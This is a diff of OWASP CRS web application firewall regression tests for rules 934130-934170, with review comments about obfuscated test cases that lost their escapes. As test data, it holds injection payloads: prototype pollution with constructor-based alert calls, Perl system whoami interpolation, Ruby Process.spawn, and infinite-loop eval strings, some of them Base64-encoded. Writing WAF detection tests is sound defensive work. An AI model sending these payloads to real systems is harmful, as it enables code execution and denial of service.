headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[context]=" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[context]=" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 9 desc: positive test case with GET parameter, analytics-utils < 1.0.3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 10 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?__proto__[jquery]=x" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[jquery]=x" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 11 desc: positive test case with GET parameter, Vue.js stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 12 desc: "Detect example payload __proto__... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" - - test_title: 934130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934130" + - test_id: 13 desc: "Detect example payload __proto__... 
submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__\u0070\u0072oto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934130" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f926730b5..04d1dd2e4 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934140.yaml" description: "Tests for rule 934140" +rule_id: 934140 tests: - - test_title: 934140-1 + - test_id: 1 desc: Perl interpolation attack stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=@{[system+whoami]}" - version: HTTP/1.0 - output: - log_contains: id "934140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=@{[system+whoami]}" + version: HTTP/1.0 + output: + log_contains: id "934140" 
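Review bot: Test 13 of 934130 lost its payload in this hunk: the description still says "with JavaScript escape sequence obfuscation", but the removed line `Cookie: test_cookie=__\u0070\u0072oto__.foo=bar` was replaced by `Cookie: test_cookie=__proto__.foo=bar`, which is byte-identical to test 12's cookie, so the obfuscated variant is no longer exercised and a regression in the rule's `\uXXXX` decoding would go unnoticed. Restore the original value and keep the backslashes literal by single-quoting it, `Cookie: 'test_cookie=__\u0070\u0072oto__.foo=bar'`; a double-quoted scalar would let the YAML parser turn `\u0070\u0072` into `pr` before the request is sent, which looks like a plausible way the payload got flattened during the conversion (not confirmable from the diff alone). If the plain form is intentionally wanted as well, add it as a separate test_id rather than overwriting this one.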
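Review bot: 934140 still has only the single positive case `uri: "/get?x=@{[system+whoami]}"` and no false-positive guard, whereas 934130 (test 1, `no_log_contains: id "934130"`) and 934160 (test 1) both start with a negative test; without one, a later broadening of the Perl-interpolation regex would still pass this file. Since the file is being rewritten to the new `test_id` schema anyway, add a `test_id: 2` with a benign `@`-bearing value such as `uri: "/get?x=user@example.com"` and `no_log_contains: id "934140"` (confirm the value does not trigger the rule before committing). The same gap exists in the 934150 hunk below, which also carries only one positive case.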
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index f52c43e6d..744933f91 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934150.yaml" description: "Tests for rule 934150" +rule_id: 934150 tests: - - test_title: 934150-1 + - test_id: 1 desc: Ruby injection test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=Process.spawn(%22id%22)" - version: HTTP/1.0 - output: - log_contains: id "934150" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=Process.spawn(%22id%22)" + version: HTTP/1.0 + output: + log_contains: id "934150" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 0289e3b7c..6b4f240fc 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml 
@@ -1,535 +1,501 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934160.yaml" description: "Tests for rule 934160" +rule_id: 934160 tests: - - test_title: 934160-1 + - test_id: 1 desc: Normal text false positive test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=while%20(foo)%20is%20bar." - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=while%20(foo)%20is%20bar." + version: HTTP/1.0 + output: + no_log_contains: id "934160" + - test_id: 2 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!false)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!false)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 3 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 4 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!%2B0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!%2B0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 5 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 6 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 7 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
'/get?eval=while(!"");' + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 8 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!'');" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 9 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!``);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 10 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 11 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(Infinity);" - version: HTTP/1.0 - output: - log_contains: 
id "934160" - - test_title: 934160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(Infinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 12 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-Infinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 13 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2BInfinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2BInfinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 14 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-1);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 15 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 
- headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2B1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2B1);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 16 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(new%20Date);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(new%20Date);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 17 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(this);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(this);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 18 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(String);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 
uri: "/get?eval=while(String);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 19 desc: while truthy with negation (false positive) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!true);" - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!true);" + version: HTTP/1.0 + output: + no_log_contains: id "934160" + - test_id: 20 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!{});" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!{});" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 21 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!![]);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!![]);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 22 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - 
port: 80 - uri: '/get?eval=while(!!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!!"");' + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 23 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!'');" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 24 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!``);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 25 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!null)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!null)" + version: HTTP/1.0 + 
output: + log_contains: id "934160" + - test_id: 26 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!undefined)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!undefined)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 27 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!NaN)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!NaN)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 28 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while((true)))" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while((true)))" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 29 desc: "Detect example DoS loop while(true) submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 30 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0077\u0068ile(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 31 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 32 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" + - test_id: 33 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log_contains: id "934160" 
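Review bot: Tests 30 and 33 no longer test what their `desc` says: the new side sends `uri: "/get?eval=while(true);"` for test 30 and `uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D"` for test 33, which are byte-for-byte the requests of tests 29 and 31, so the two "JavaScript escape sequence obfuscation" cases have become duplicates. The old double-quoted `"/get?eval=\u0077\u0068ile(true);"` had the same gap, because a YAML double-quoted scalar decodes `\u0077\u0068` to `wh` before anything is sent, which is presumably why the converter wrote the plain form; only test 32, whose Base64 blob decodes to the literal `\u0077\u0068ile(true);`, still covers the obfuscated variant. If 934160 is meant to see the escaped form, single-quote the URIs so the backslashes reach the WAF (`uri: '/get?eval=\u0077\u0068ile(true);'` and `uri: '/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D'`) and confirm the rule's transformations decode them; otherwise drop the two tests or reword their `desc` so the suite does not claim coverage it lacks.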
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
index 9d3111052..8348a8bb9 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
@@ -1,61 +1,57 @@
---
meta:
author: "fzipi, azurit"
- enabled: true
- name: "934170.yaml"
description: "Tests for rule 934170 - PHP data scheme support"
+rule_id: 934170
tests:
- - test_title: 934170-1
+ - test_id: 1
desc: "SSRF - data: scheme test - IN2OZO3N coverage"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
